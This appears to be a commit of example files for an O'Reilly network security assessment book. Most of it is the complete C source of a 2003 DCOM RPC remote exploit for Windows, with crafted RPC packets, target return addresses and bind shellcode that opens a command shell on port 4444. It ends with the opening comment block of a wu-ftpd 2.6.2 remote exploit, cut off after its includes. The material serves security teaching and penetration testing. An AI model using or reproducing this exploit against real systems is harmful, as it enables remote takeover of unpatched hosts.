
Initial commit

## Example files for the title:
# Network Security Assessment 2nd Edition, by Chris McNab
[![Network Security Assessment 2nd Edition, by Chris McNab](http://akamaicovers.oreilly.com/images/9780596510305/cat.gif)](https://www.safaribooksonline.com/library/view/title/9780596510305//)
The following applies to example files from material published by O’Reilly Media, Inc. Content from other publishers may include different rules of usage. Please refer to any additional usage rights explained in the actual example files or refer to the publisher’s website.
O'Reilly books are here to help you get your job done. In general, you may use the code in O'Reilly books in your programs and documentation. You do not need to contact us for permission unless you're reproducing a significant portion of the code. For example, writing a program that uses several chunks of code from our books does not require permission. Answering a question by citing our books and quoting example code does not require permission. On the other hand, selling or distributing a CD-ROM of examples from O'Reilly books does require permission. Incorporating a significant amount of example code from our books into your product's documentation does require permission.
We appreciate, but do not require, attribution. An attribution usually includes the title, author, publisher, and ISBN.
If you think your use of code examples falls outside fair use or the permission given here, feel free to contact us at <permissions@oreilly.com>.
Please note that the examples are not production code and have not been carefully testing. They are provided "as-is" and come with no warranty of any kind.
logo.png


/*
**
** 2003/07/27 - DCOM RPC WIN32 remote exploit (Most languages)
**
** FlashSky/Benjurry and, H D Moore's code is very excellent.
** It works well even if change only return address.
** I didn't feel necessity for new make.
**
** Thankful to them.
**
** 2003/07/30 - Update, Added magic return address.
**
** kokanin supplied very excellent information:
** URL: http://lists.netsys.com/pipermail/full-disclosure/2003-July/012000.html
**
** * As well as Korean thanks to, a lot of systems can exploit.
**
** --
** Thank you.
**
** P.S: Sorry, for my poor english.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
u_char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,
0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,
0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,
0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
u_char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,
0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,
0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,
0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,
0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,
0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,
0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,
0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,
0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,
0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,
0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,
0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,
0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,
0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char request2[]=
{
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
u_char request3[]=
{
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,
0x63,0x00,0x00,0x00
};
u_char request4[]=
{
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,
0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char shellcode[]=
{
/* port 4444 bind shellcode */
0x46,0x00,0x58,0x00,0x4e,0x00,0x42,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x4e,0x00,0x42,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0xff,0xff,0xff,0xff,
0xcc,0xe0,0xfd,0x7f,0xcc,0xe0,0xfd,0x7f,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,
0x19,0x5e,0x31,0xc9,0x81,0xe9,0x89,0xff,
0xff,0xff,0x81,0x36,0x80,0xbf,0x32,0x94,
0x81,0xee,0xfc,0xff,0xff,0xff,0xe2,0xf2,
0xeb,0x05,0xe8,0xe2,0xff,0xff,0xff,0x03,
0x53,0x06,0x1f,0x74,0x57,0x75,0x95,0x80,
0xbf,0xbb,0x92,0x7f,0x89,0x5a,0x1a,0xce,
0xb1,0xde,0x7c,0xe1,0xbe,0x32,0x94,0x09,
0xf9,0x3a,0x6b,0xb6,0xd7,0x9f,0x4d,0x85,
0x71,0xda,0xc6,0x81,0xbf,0x32,0x1d,0xc6,
0xb3,0x5a,0xf8,0xec,0xbf,0x32,0xfc,0xb3,
0x8d,0x1c,0xf0,0xe8,0xc8,0x41,0xa6,0xdf,
0xeb,0xcd,0xc2,0x88,0x36,0x74,0x90,0x7f,
0x89,0x5a,0xe6,0x7e,0x0c,0x24,0x7c,0xad,
0xbe,0x32,0x94,0x09,0xf9,0x22,0x6b,0xb6,
0xd7,0x4c,0x4c,0x62,0xcc,0xda,0x8a,0x81,
0xbf,0x32,0x1d,0xc6,0xab,0xcd,0xe2,0x84,
0xd7,0xf9,0x79,0x7c,0x84,0xda,0x9a,0x81,
0xbf,0x32,0x1d,0xc6,0xa7,0xcd,0xe2,0x84,
0xd7,0xeb,0x9d,0x75,0x12,0xda,0x6a,0x80,
0xbf,0x32,0x1d,0xc6,0xa3,0xcd,0xe2,0x84,
0xd7,0x96,0x8e,0xf0,0x78,0xda,0x7a,0x80,
0xbf,0x32,0x1d,0xc6,0x9f,0xcd,0xe2,0x84,
0xd7,0x96,0x39,0xae,0x56,0xda,0x4a,0x80,
0xbf,0x32,0x1d,0xc6,0x9b,0xcd,0xe2,0x84,
0xd7,0xd7,0xdd,0x06,0xf6,0xda,0x5a,0x80,
0xbf,0x32,0x1d,0xc6,0x97,0xcd,0xe2,0x84,
0xd7,0xd5,0xed,0x46,0xc6,0xda,0x2a,0x80,
0xbf,0x32,0x1d,0xc6,0x93,0x01,0x6b,0x01,
0x53,0xa2,0x95,0x80,0xbf,0x66,0xfc,0x81,
0xbe,0x32,0x94,0x7f,0xe9,0x2a,0xc4,0xd0,
0xef,0x62,0xd4,0xd0,0xff,0x62,0x6b,0xd6,
0xa3,0xb9,0x4c,0xd7,0xe8,0x5a,0x96,0x80,
0xae,0x6e,0x1f,0x4c,0xd5,0x24,0xc5,0xd3,
0x40,0x64,0xb4,0xd7,0xec,0xcd,0xc2,0xa4,
0xe8,0x63,0xc7,0x7f,0xe9,0x1a,0x1f,0x50,
0xd7,0x57,0xec,0xe5,0xbf,0x5a,0xf7,0xed,
0xdb,0x1c,0x1d,0xe6,0x8f,0xb1,0x78,0xd4,
0x32,0x0e,0xb0,0xb3,0x7f,0x01,0x5d,0x03,
0x7e,0x27,0x3f,0x62,0x42,0xf4,0xd0,0xa4,
0xaf,0x76,0x6a,0xc4,0x9b,0x0f,0x1d,0xd4,
0x9b,0x7a,0x1d,0xd4,0x9b,0x7e,0x1d,0xd4,
0x9b,0x62,0x19,0xc4,0x9b,0x22,0xc0,0xd0,
0xee,0x63,0xc5,0xea,0xbe,0x63,0xc5,0x7f,
0xc9,0x02,0xc5,0x7f,0xe9,0x22,0x1f,0x4c,
0xd5,0xcd,0x6b,0xb1,0x40,0x64,0x98,0x0b,
0x77,0x65,0x6b,0xd6,0x93,0xcd,0xc2,0x94,
0xea,0x64,0xf0,0x21,0x8f,0x32,0x94,0x80,
0x3a,0xf2,0xec,0x8c,0x34,0x72,0x98,0x0b,
0xcf,0x2e,0x39,0x0b,0xd7,0x3a,0x7f,0x89,
0x34,0x72,0xa0,0x0b,0x17,0x8a,0x94,0x80,
0xbf,0xb9,0x51,0xde,0xe2,0xf0,0x90,0x80,
0xec,0x67,0xc2,0xd7,0x34,0x5e,0xb0,0x98,
0x34,0x77,0xa8,0x0b,0xeb,0x37,0xec,0x83,
0x6a,0xb9,0xde,0x98,0x34,0x68,0xb4,0x83,
0x62,0xd1,0xa6,0xc9,0x34,0x06,0x1f,0x83,
0x4a,0x01,0x6b,0x7c,0x8c,0xf2,0x38,0xba,
0x7b,0x46,0x93,0x41,0x70,0x3f,0x97,0x78,
0x54,0xc0,0xaf,0xfc,0x9b,0x26,0xe1,0x61,
0x34,0x68,0xb0,0x83,0x62,0x54,0x1f,0x8c,
0xf4,0xb9,0xce,0x9c,0xbc,0xef,0x1f,0x84,
0x34,0x31,0x51,0x6b,0xbd,0x01,0x54,0x0b,
0x6a,0x6d,0xca,0xdd,0xe4,0xf0,0x90,0x80,
0x2f,0xa2,0x04,0x00
};
struct os_plat_pk
{
int op_pk_num;
char *op_pk_str;
u_long retloc_jmp_esp;
};
struct os_plat_pk __pt_pkg_form[]=
{
{0,"Windows 2000 magic version 1",0x0018759F},
{1,"Windows 2000 magic version 2",0x001875E3},
{2,"Windows 2000 magic version 3",0x001F0CD0},
{3,"Windows 2000 magic version 4",0x010016C6},
{4,"Windows 2000 magic version 5",0x010016CB},
{0x82,NULL,0}
};
#define DEF_STR "It's test"
#define DEF_BF (0x1000)
#define DEF_SZ (0xff)
#define GET_SZ (0x400)
int sexsock(char *conn_host_nm,int conn_port_nm);
void start_shell(int st_sock_va);
void re_connt_lm(int st_sock_va);
void pri_usg(char *f_nm);
void pri_banrl();
int main(int argc, char *argv[])
{
int sock,type_def=(0),r_r1,r_r2,whgl;
u_long retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
u_char get_bf[(DEF_BF)],atk_bf[(DEF_BF)];
char def_host[(DEF_SZ)]=(DEF_STR);
(void)pri_banrl();
while((whgl=getopt(argc,argv,"T:t:H:h:Ii"))!=EOF)
{
switch(whgl)
{
case 'T':
case 't':
if((type_def=atoi(optarg))>4)
{
(void)pri_usg(argv[0]);
}
else retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
break;
case 'H':
case 'h':
memset((char *)def_host,0,sizeof(def_host));
strncpy(def_host,optarg,sizeof(def_host)-1);
break;
case 'I':
case 'i':
(void)pri_usg(argv[0]);
break;
case '?':
(void)pri_usg(argv[0]);
break;
}
}
if(strstr(def_host,(DEF_STR)))
{
(void)pri_usg(argv[0]);
}
fprintf(stdout," [*] Target: %s.\n",__pt_pkg_form[type_def].op_pk_str);
fprintf(stdout," [0] Add return address.\n");
memcpy((u_char *)shellcode+36,(u_char *)&retloc_jmp_esp,4);
fprintf(stdout," [1] Start, shellcode setting.\n");
memcpy((u_char *)atk_bf,request1,sizeof(request1));
r_r1=sizeof(request1);
r_r2=sizeof(shellcode)/2;
#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l
QIK_SHIFT(request2,0,r_r2);
QIK_SHIFT(request2,8,r_r2);
memcpy((u_char *)atk_bf+r_r1,request2,sizeof(request2));
r_r1+=sizeof(request2);
memcpy((u_char *)atk_bf+r_r1,shellcode,sizeof(shellcode));
r_r1+=sizeof(shellcode);
memcpy((u_char *)atk_bf+r_r1,request3,sizeof(request3));
r_r1+=sizeof(request3);
memcpy((u_char *)atk_bf+r_r1,request4,sizeof(request4));
r_r1+=sizeof(request4);
r_r2=sizeof(shellcode)-12;
QIK_SHIFT(atk_bf,8,r_r2);
QIK_SHIFT(atk_bf,16,r_r2);
QIK_SHIFT(atk_bf,128,r_r2);
QIK_SHIFT(atk_bf,132,r_r2);
QIK_SHIFT(atk_bf,180,r_r2);
QIK_SHIFT(atk_bf,184,r_r2);
QIK_SHIFT(atk_bf,208,r_r2);
QIK_SHIFT(atk_bf,396,r_r2);
fprintf(stdout," [2] Trying %s:135 ...\n",def_host);
sock=(int)sexsock(def_host,(135));
(void)re_connt_lm(sock);
fprintf(stdout," [3] Connected to %s:135.\n",def_host);
send(sock,bindstr,sizeof(bindstr),0);
recv(sock,get_bf,sizeof(get_bf),0);
fprintf(stdout," [4] Send, attack code.\n");
send(sock,atk_bf,r_r1,0);
close(sock);
fprintf(stdout," [5] OK, Trying %s:4444 ...\n",def_host);
fprintf(stdout," [*] Waiting, cmd shell ");
fflush(stdout);
sleep(1);
fprintf(stdout,".");
fflush(stdout);
sleep(1);
fprintf(stdout,".");
fflush(stdout);
sleep(1);
fprintf(stdout,".\n");
sock=(int)sexsock(def_host,(4444));
(void)re_connt_lm(sock);
(void)start_shell(sock);
exit(0);
}
int sexsock(char *conn_host_nm,int conn_port_nm)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;
if((sxp=gethostbyname(conn_host_nm))==NULL)
{
herror(" [-] gethostbyname() error");
return(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror(" [-] socket() error");
return(-1);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(conn_port_nm);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
{
perror(" [-] connect() error");
return(-1);
}
return(sock);
}
void start_shell(int st_sock_va)
{
int died;
char *command="cd C:\\ & echo Wow, are u hacker now ?!\n";
char readbuf[(GET_SZ)];
fd_set rset;
memset((char *)readbuf,0,sizeof(readbuf));
fprintf(stdout," [!] Executed shell successfully !\n\n");
send(st_sock_va,command,strlen(command),0);
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(st_sock_va,&rset);
FD_SET(STDIN_FILENO,&rset);
select(st_sock_va+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(st_sock_va,&rset))
{
died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
if(died<=0)
exit(0);
readbuf[died]=0;
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>0)
{
readbuf[died]=0;
write(st_sock_va,readbuf,died);
}
}
}
return;
}
void re_connt_lm(int st_sock_va)
{
if(st_sock_va==-1)
{
fprintf(stdout," [-] Failed.\n\n");
fprintf(stdout," Happy Exploit ! :-)\n\n");
exit(-1);
}
}
void pri_usg(char *f_nm)
{
int r_rn=0;
fprintf(stdout," Usage: %s -option [argument]\n\n",f_nm);
fprintf(stdout,"\t -h [hostname] - target host.\n");
fprintf(stdout,"\t -t [number] - select target number.\n\n");
fprintf(stdout," Select target number>\n\n");
for(;;)
{
if(__pt_pkg_form[r_rn].op_pk_num==(0x82))
break;
else
{
fprintf(stdout,"\t {%d} %s\n",__pt_pkg_form[r_rn].op_pk_num,__pt_pkg_form[r_rn].op_pk_str);
}
r_rn++;
}
fprintf(stdout,"\n Exmaple> %s -h korea.microsoft.com -t3\n\n",f_nm);
exit(0);
}
void pri_banrl()
{
fprintf(stdout,"\n DCOM RPC WIN32 remote exploit (Most languages)\n\n");
}
/* eox */
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** Public version - 2003/08/02
**
** --
** This vulnerability was discovered by Wojciech Purczynski <cliph@isec.pl>,
** Janusz Niewiadomski <funkysh@isec.pl>.
** They offered excellent Advisory, I'm thankful to them.
**
** URL: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** More useful version isn't going to share. (various test version)
** For reference, exploit method that use `STOR' command succeeded. :-)
**
** Update: August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** August 3, Brute-Force function addition.
** --
** Thank you.
**
*/
#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEBUG_NG
#undef DEBUG_NG